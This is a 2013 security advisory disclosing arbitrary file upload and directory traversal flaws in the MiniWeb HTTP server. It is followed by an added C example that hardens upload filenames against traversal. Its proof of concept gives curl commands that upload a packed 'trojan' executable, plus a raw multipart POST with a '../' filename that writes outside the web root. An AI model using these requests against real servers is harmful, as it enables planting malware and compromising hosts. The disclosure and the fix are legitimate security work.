============================================================================================
Vulnerable Software: MiniWeb (build 300, built on Feb 28 2013)
Official Site: http://miniweb.sourceforge.net/
Vulns: Remote arbitrary file upload, Directory traversal.
Tested Software/version: MiniWeb (build 300, built on Feb 28 2013)
Tested on: Windows XP SP2 32 bit.
=================================About software:===========================================
MiniWeb is a mini HTTP server implementation written in the C language, featuring low system resource consumption, high efficiency, good flexibility and high portability. It is capable of serving multiple clients with a single thread, supporting GET and POST methods, authentication, dynamic contents (dynamic web page and page variable substitution) and file uploading. MiniWeb runs on POSIX compliant OS, like Linux, as well as Microsoft Windows (Cygwin, MinGW and native build with Visual Studio). The binary size of MiniWeb can be as small as 20KB (on x86 Linux).

The target of the project is to provide a fast, functional and low resource consuming HTTP server that is embeddable in other applications (as a static or dynamic library) as well as a standalone web server.

MiniWeb supports transparent 7-zip decompression. Web contents can be compressed into 7-zip archives and clients can access the contents inside the 7-zip archive just like in a directory.

MiniWeb can also be used in audio/video streaming applications, or more specifically, VOD (video-on-demand) service. Currently a VOD client/server is being developed on MiniWeb.
============================================================================================
About vulns:
This software suffers from 2 critical vulns.

Any remote/local user can upload arbitrary files to the web server.

Proof of concept:
In this scenario, using Cygwin + curl, a remote attacker uploads a trojan called "taskmgr.exe" to the remote web server.
user@myhost /cygdrive/c/dir1/dir2
$ ipconfig

Настройка протокола IP для Windows

Подключение по локальной сети - Ethernet адаптер:

        Состояние сети . . . . . . . . . : сеть отключена

VirtualBox Host-Only Network - Ethernet адаптер:

        DNS-суффикс этого подключения . . :
        IP-адрес . . . . . . . . . . . . : 192.168.0.1
        Маска подсети . . . . . . . . . . : 255.255.255.0
        Основной шлюз . . . . . . . . . . : 192.168.0.1

user@myhost /cygdrive/c/dir1/dir2
$ curl -I 192.168.0.15:8000
curl: (52) Empty reply from server

user@myhost /cygdrive/c/dir1/dir2
$ curl 192.168.0.15:8000
/

Directory of /

Directory content generated by MiniWeb

user@myhost /cygdrive/c/dir1/dir2
$ #Uploading remotely our troyan to remote system.

user@myhost /cygdrive/c/dir1/dir2
$ curl -i -F name=taskmgr.exe -F filedata=@taskmgr.exe http://192.168.0.15:8000/epicfail/
HTTP/1.1 404 Not Found
Server: MiniWeb
Content-length: 125
Content-Type: text/html

404 Not Found

Not Found

The requested URL has no content.

user@myhost /cygdrive/c/dir1/dir2
$ #Now fetching directory index from remote system.

user@myhost /cygdrive/c/dir1/dir2
$ curl 192.168.0.15:8000
/

Directory of /

..             <dir>                 Sat, 06 Apr 2013 23:55:29 GMT
taskmgr.exe    329 KB    exe file    Sun, 07 Apr 2013 00:14:38 GMT

Directory content generated by MiniWeb

user@myhost /cygdrive/c/dir1/dir2
$ #Lol our troyan (taskmgr.exe) uploaded successfully) This is design flaw.

user@myhost /cygdrive/c/dir1/dir2
$ curl 192.168.0.15:8000/taskmgr.exe>task2.exe

user@myhost /cygdrive/c/dir1/dir2
$ file task2.exe
task2.exe: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed

user@myhost /cygdrive/c/dir1/dir2
$ rm -rf task2.exe

So, this means any remote user can upload, spoof and overwrite any files on the remote server.

Moreover, this web server software contains a directory traversal vuln. Using the second vuln it is possible to upload any trojan outside of the document root to the operating system, spoof some system executables and, as a result, compromise the remote operating system, e.g. on the next reboot when it starts.

In this case the attacker uses Fiddler:
================================================================================
METHOD: POST
URL: http://192.168.0.15:8000/AAAAAAAAAAAAAAAAAAAAAAA
Host: 192.168.0.15:8000
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:20.0) Gecko/20100101 Firefox/20.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------78522398122376
Content-Length: 84906

request body:
-----------------------------78522398122376
Content-Disposition: form-data; name="user"

-----------------------------78522398122376
Content-Disposition: form-data; name="pass"

-----------------------------78522398122376
Content-Disposition: form-data; name="file"; filename="../../../../../../../../../../../../../OWNED_BY_AKASTEP.txt"
Content-Type: image/png

Dude! Your machine OwnEd!
-----------------------------78522398122376
Content-Disposition: form-data; name="button"

Upload
-----------------------------78522398122376--
================================================================================
Few Printscreens:
1remotesystem.PNG       http://s019.radikal.ru/i612/1304/09/510e3b430b04.png
2attackersends.PNG      http://s017.radikal.ru/i406/1304/a1/494cef4de6f0.png
3remotesystempwned.PNG  http://s05.radikal.ru/i178/1304/f3/5fe4d9cb2111.png
================================================
KUDOSSSSSSS
================================================
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com
securitylab.ru
secunia.com
securityhome.eu
exploitsdownload.com
osvdb.com
websecurity.com.ua
1337day.com
itsecuritysolutions.org
waraxe.us
exploit-db.com
to all Aa Team + to all Azerbaijan Black HatZ + *Especially to my bro CAMOUFL4G3 *
To All Turkish Hackers + ottoman38 & HERO_AZE
*Super special KUDOS to my bro Brendan Coles! Love you and Respect you dude! Thank you!*
================================================
/AkaStep
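The traversal in the Fiddler request above works because the client-supplied multipart filename is joined to the upload directory as-is. The C below is an added example written for this page; it is not MiniWeb's code and not from the advisory's author. It shows that naive join beside a hardened version that allowlists the filename, and a lexical containment check (path_escapes_root) that a server can apply to any client-supplied relative path, URL paths included, once it has been percent-decoded. The upload root /srv/www, the function names and the sample inputs are assumptions. This covers only the traversal; the first issue (the upload handler accepting files from anyone) is addressed by requiring authentication on the upload endpoint or disabling uploads.

```c
/* Added example (not MiniWeb's code): hardening the mapping from a
 * client-supplied filename to an on-disk path against directory traversal. */
#include <stdio.h>
#include <string.h>
#include <ctype.h>
#include <stddef.h>

/* Vulnerable pattern: the multipart filename is joined to the upload root
 * verbatim, so "../../x" escapes the document root. */
int naive_upload_path(const char *root, const char *filename,
                      char *out, size_t outlen)
{
    int n = snprintf(out, outlen, "%s/%s", root, filename);
    return (n > 0 && (size_t)n < outlen) ? 0 : -1;
}

/* Hardened: allowlist the name (no separators, no ".", no "..", no leading
 * dot, only [A-Za-z0-9._-]), bound its length, then join. Returns 0 on
 * success, -1 when the name is rejected or the output buffer is too small. */
int safe_upload_path(const char *root, const char *filename,
                     char *out, size_t outlen)
{
    size_t len = strlen(filename);
    if (len == 0 || len >= 256) return -1;   /* empty or unreasonably long */
    if (filename[0] == '.') return -1;       /* rejects ".", "..", dotfiles */
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)filename[i];
        if (!(isalnum(c) || c == '.' || c == '-' || c == '_'))
            return -1;                       /* '/', '\\', space, '%', ... */
    }
    int n = snprintf(out, outlen, "%s/%s", root, filename);
    return (n > 0 && (size_t)n < outlen) ? 0 : -1;
}

/* Lexical containment check for a relative path (URL path or filename)
 * after percent-decoding: returns 1 if some ".." component would climb
 * above the root, 0 otherwise. Both '/' and '\\' delimit components
 * because the server also runs natively on Windows. */
int path_escapes_root(const char *rel)
{
    int depth = 0;
    const char *p = rel;
    while (*p) {
        const char *start = p;
        while (*p && *p != '/' && *p != '\\') p++;
        size_t clen = (size_t)(p - start);
        if (clen == 2 && start[0] == '.' && start[1] == '.') {
            if (--depth < 0) return 1;       /* climbed above the root */
        } else if (clen > 0 && !(clen == 1 && start[0] == '.')) {
            depth++;                         /* ordinary component */
        }
        if (*p) p++;                         /* skip the separator */
    }
    return 0;
}

int main(void)
{
    /* Constructed sample: the traversal filename from the request above. */
    const char *evil = "../../../../../../../../../../../../../OWNED_BY_AKASTEP.txt";
    char buf[512];

    if (naive_upload_path("/srv/www", evil, buf, sizeof buf) == 0)
        printf("naive join writes to: %s\n", buf);
    printf("safe_upload_path rejects it: %s\n",
           safe_upload_path("/srv/www", evil, buf, sizeof buf) == -1 ? "yes" : "no");
    printf("path_escapes_root(\"%s\") = %d\n", evil, path_escapes_root(evil));
    printf("path_escapes_root(\"epicfail/taskmgr.exe\") = %d\n",
           path_escapes_root("epicfail/taskmgr.exe"));
    return 0;
}
```

safe_upload_path deliberately refuses rather than "cleans" a bad name: stripping "../" and re-checking is the classic source of bypasses, and a rejected upload costs the legitimate user nothing. path_escapes_root is a lexical check only, so it must run on the decoded path and does not protect against symlinks inside the upload root; resolving the final path (realpath on POSIX) and comparing it against the root adds that second layer.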